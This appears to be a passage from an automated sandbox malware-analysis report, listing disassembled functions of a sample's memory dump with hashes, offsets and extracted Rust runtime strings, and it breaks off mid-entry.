                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 3510742995-0
                                                                                                        • Opcode ID: c3c0e7016b895e9d6adfb3c0e18206138b798e528958181e285871756d13dd56
                                                                                                        • Instruction ID: fda6f58c33c1f76bbd3dd6ef5a656375295688fba1bd274693b87c170f7057f5
                                                                                                        • Opcode Fuzzy Hash: c3c0e7016b895e9d6adfb3c0e18206138b798e528958181e285871756d13dd56
                                                                                                        • Instruction Fuzzy Hash: 0AB28D32A08AC189EB719F35D8847FDA7A0FB14798F854135DA4D4BB89DF39D684C322
                                                                                                        Function 00007FF79E8FFF83 Relevance: 2.2, Strings: 1, Instructions: 994COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: assertion failed: lookahead_size >= len_to_move
                                                                                                        • API String ID: 0-1193057213
                                                                                                        • Opcode ID: f0c0ae32f07f374757cf32290c73185b533844ff279fabdaf0c837a95eb7c6d5
                                                                                                        • Instruction ID: f1707e11a1596ab73fe35db617791b278d158cdbf361ca779d74ace7114ee5ca
                                                                                                        • Opcode Fuzzy Hash: f0c0ae32f07f374757cf32290c73185b533844ff279fabdaf0c837a95eb7c6d5
                                                                                                        • Instruction Fuzzy Hash: 94A2C072A0878186E765AB25E0807B9B7B1FB48790F804536EF9D43B95DF3CE4A0C721
                                                                                                        Function 00007FF79E99ADE0 Relevance: 1.9, Strings: 1, Instructions: 628COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • 0x0o00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899assertion failed: *curr > 19, xrefs: 00007FF79E99AE55
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0x0o00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899assertion failed: *curr > 19
                                                                                                        • API String ID: 0-1744301434
                                                                                                        • Opcode ID: 36052ce367510e7e9e3149ff4b1c96de7990bb98a338042ed2551ff82bb53209
                                                                                                        • Instruction ID: 27ee85c34a2b8185103d075ad91aa690c0d1ebec85d0d967e5792220cc693823
                                                                                                        • Opcode Fuzzy Hash: 36052ce367510e7e9e3149ff4b1c96de7990bb98a338042ed2551ff82bb53209
                                                                                                        • Instruction Fuzzy Hash: 0952F063A086E08ED724CF3584902BC7FB6F759768F944225EA9A03B98DB3CD442D735
                                                                                                        Function 00007FF79E9634B6 Relevance: 1.8, Strings: 1, Instructions: 539COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • internal error: entered unreachable code/rust/deps\memchr-2.5.0\src\memmem\x86\avx.rs, xrefs: 00007FF79E9634B6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: internal error: entered unreachable code/rust/deps\memchr-2.5.0\src\memmem\x86\avx.rs
                                                                                                        • API String ID: 0-3329622625
                                                                                                        • Opcode ID: 1fa760ea6060da2a839ba96ccfb6cdd64bb8e8eee01c00345c5055e6ba91de01
                                                                                                        • Instruction ID: 555e8342ba073902fd0e52b207a69c580905bbd6f31cf91981e0e48155b941ae
                                                                                                        • Opcode Fuzzy Hash: 1fa760ea6060da2a839ba96ccfb6cdd64bb8e8eee01c00345c5055e6ba91de01
                                                                                                        • Instruction Fuzzy Hash: 1A225562B08A9985E721DF3584807BDBBA1BB45BA8F844133DE4E033D2CB79D556D332
                                                                                                        Function 00007FF79E8F565B Relevance: 1.7, Strings: 1, Instructions: 445COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • 0b0x0o00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899assertion failed: *curr > 19, xrefs: 00007FF79E9983FB, 00007FF79E99867C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0b0x0o00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899assertion failed: *curr > 19
                                                                                                        • API String ID: 0-528522809
                                                                                                        • Opcode ID: fc41eb1ede8def6e6519501b13a1721de8b2c3ff54d1bada0408f23752f5a195
                                                                                                        • Instruction ID: 26e25502ef6ac47a56f4109e05787786fa1692187afbf41731c8f87c242d9b8c
                                                                                                        • Opcode Fuzzy Hash: fc41eb1ede8def6e6519501b13a1721de8b2c3ff54d1bada0408f23752f5a195
                                                                                                        • Instruction Fuzzy Hash: 0CF13472A0869196E779EB34E054BF9B328FB55394FC0A035DA8E477E0CF2C9245C362
                                                                                                        Function 00007FF79E98F730 Relevance: 1.6, Strings: 1, Instructions: 372COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 00000000
                                                                                                        • API String ID: 0-3221785859
                                                                                                        • Opcode ID: af8589ce7ce3c7fcc32d6d021bc8cd4f75293f8d31cfa919c749519a754305ce
                                                                                                        • Instruction ID: 543c1be60130b44d978bf9b22a96f4bd1b0c98fb5524182b1891a66c64ff226c
                                                                                                        • Opcode Fuzzy Hash: af8589ce7ce3c7fcc32d6d021bc8cd4f75293f8d31cfa919c749519a754305ce
                                                                                                        • Instruction Fuzzy Hash: 1AD16CA1F0874689EB35DE3594807B5A762BB557A4F84A232DD0D07BA4EF3CD542C332
                                                                                                        Function 00007FF79E98DBE0 Relevance: 1.6, Strings: 1, Instructions: 337COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: falsetrue
                                                                                                        • API String ID: 0-2583396087
                                                                                                        • Opcode ID: 333b635a2e3723669b4bd6ffd21f5e89aa966b3e4f75eb61e99eb9a69a60b3c7
                                                                                                        • Instruction ID: c53ce3786fa146227f70ab0b6236ab97090e1ad7ca759368da3efddfc2c17c94
                                                                                                        • Opcode Fuzzy Hash: 333b635a2e3723669b4bd6ffd21f5e89aa966b3e4f75eb61e99eb9a69a60b3c7
                                                                                                        • Instruction Fuzzy Hash: F7B1ABD2E2DBA206F633573954417B49A005FB37B4A81D736FC7D31BF1EB29A6429220
                                                                                                        Function 00007FF79E8FF7E0 Relevance: 1.6, Strings: 1, Instructions: 337COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: assertion failed: d.params.flush_remaining == 0
                                                                                                        • API String ID: 0-1590815299
                                                                                                        • Opcode ID: 28ebf524fac9da3548d04501888575cebaec2f5e954b141b87eb25281300f406
                                                                                                        • Instruction ID: f0c76b57073151be620bb875c5fa283ca4d618c28e5eb36a74a15791db0ae5fd
                                                                                                        • Opcode Fuzzy Hash: 28ebf524fac9da3548d04501888575cebaec2f5e954b141b87eb25281300f406
                                                                                                        • Instruction Fuzzy Hash: 01E1E022A1868682E774EBB1E081BBAB391FB58780F945435DB9E47781DF7CE094C760
                                                                                                        Function 00007FF79E920D80 Relevance: 1.6, APIs: 1, Instructions: 320COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9ddf95f9254b534a930d4aa0364dcb83390594457672d44a58cdedd8fc6ec9d9
                                                                                                        • Instruction ID: 74a208fa83de03f835b60e5e5b16141a2814e288cef91006b87ec96f4bcff33e
                                                                                                        • Opcode Fuzzy Hash: 9ddf95f9254b534a930d4aa0364dcb83390594457672d44a58cdedd8fc6ec9d9
                                                                                                        • Instruction Fuzzy Hash: E6C1DF62B05A8585EF20AB7694803BDA3A0FB04BB8F958631DE2D077D5DF3CD1928361
                                                                                                        Function 00007FF79E97CFCB Relevance: 1.6, APIs: 1, Instructions: 301COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0f1c4759b9c53dd6aae4226f7933f57366c1bf6370748fe1bdb9739f57d40fba
                                                                                                        • Instruction ID: b30ec57e5f937024bb1dc31923aef6773eb2dd34e902d2f43a1416b066f0c012
                                                                                                        • Opcode Fuzzy Hash: 0f1c4759b9c53dd6aae4226f7933f57366c1bf6370748fe1bdb9739f57d40fba
                                                                                                        • Instruction Fuzzy Hash: D7C12322F1865189FB209B78C8803BD67B0BB053A8F844535DE5E27BC9DE7D9189C332
                                                                                                        Function 00007FF79E9215E0 Relevance: 1.5, Strings: 1, Instructions: 294COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: K
                                                                                                        • API String ID: 0-856455061
                                                                                                        • Opcode ID: 5a83610895b6275a0df5c1d904be7e79572423fd04513c0201201710ee0097df
                                                                                                        • Instruction ID: 6e8ec576e4ae5ff97253ed75208054482986e57789e612c01ee32b7926921515
                                                                                                        • Opcode Fuzzy Hash: 5a83610895b6275a0df5c1d904be7e79572423fd04513c0201201710ee0097df
                                                                                                        • Instruction Fuzzy Hash: 56E12772604BD089EB608F76A8803ED77A1F74979CF458125EE8D8BB49DF38D5A4C360
                                                                                                        Function 00007FF79E997530 Relevance: 1.5, Strings: 1, Instructions: 292COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • 0x0o00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899assertion failed: *curr > 19, xrefs: 00007FF79E997705, 00007FF79E9978F5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0x0o00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899assertion failed: *curr > 19
                                                                                                        • API String ID: 0-1744301434
                                                                                                        • Opcode ID: 7e6d48b9921f409afda6eccafe663c4c55996029baa0535359b0d5b94feba515
                                                                                                        • Instruction ID: fa804bef83733b6649a667beabfe6c096cb8b635caf4454cc16d224732a24acc
                                                                                                        • Opcode Fuzzy Hash: 7e6d48b9921f409afda6eccafe663c4c55996029baa0535359b0d5b94feba515
                                                                                                        • Instruction Fuzzy Hash: 8FB15363B1425A8BFB659A71D001BF9A759EB003E0FC0C231DE5A177C1DE2CA54AD3A2
                                                                                                        Function 00007FF79E97D6A8 Relevance: 1.5, APIs: 1, Instructions: 248COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8cfd8f9aac5d005f5effe7e10f991f333e50d91792c8385def3c3db197be9e8d
                                                                                                        • Instruction ID: 5d54e052c6752f3729e308908c5b510d43a42d2bfa83bf33b3d0c691698b1f5b
                                                                                                        • Opcode Fuzzy Hash: 8cfd8f9aac5d005f5effe7e10f991f333e50d91792c8385def3c3db197be9e8d
                                                                                                        • Instruction Fuzzy Hash: B1914162F186428CFB24AA74C5813FD67A0BB027A8F844439DE4E177C9DE7C9188C372
                                                                                                        Function 00007FF79E921B00 Relevance: 1.5, Instructions: 1492COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 567678b4cbe1cf606fd4672ee948613a951a50faf4c757672fd9df0e84b97ba5
                                                                                                        • Instruction ID: dfb5c90f4c1b37dc0e855f8c723440c4d9ad556d1de4c47f81b512eeb63f297c
                                                                                                        • Opcode Fuzzy Hash: 567678b4cbe1cf606fd4672ee948613a951a50faf4c757672fd9df0e84b97ba5
                                                                                                        • Instruction Fuzzy Hash: 38F27D72A09AC589EB70DF35D8847EC63A0FB08B98F814135DA4D4BB99DF39D694C321
                                                                                                        Function 00007FF79E97DEF0 Relevance: 1.5, APIs: 1, Instructions: 230COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 3510742995-0
                                                                                                        • Opcode ID: 91e2399d64bce3925e0fc574a6f9411411028394deeeef8cfd960b717a8bd871
                                                                                                        • Instruction ID: 53e57640aa640f76a76421681af653bbf110064f1f8a2a30686fc42c26564eb7
                                                                                                        • Opcode Fuzzy Hash: 91e2399d64bce3925e0fc574a6f9411411028394deeeef8cfd960b717a8bd871
                                                                                                        • Instruction Fuzzy Hash: 64813752F1865289FB249A75C4913BE2FA0FB007A8F848439EE4E177C5CE3D9588D372
                                                                                                        Function 00007FF79E9375F0 Relevance: 1.5, APIs: 1, Instructions: 221COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
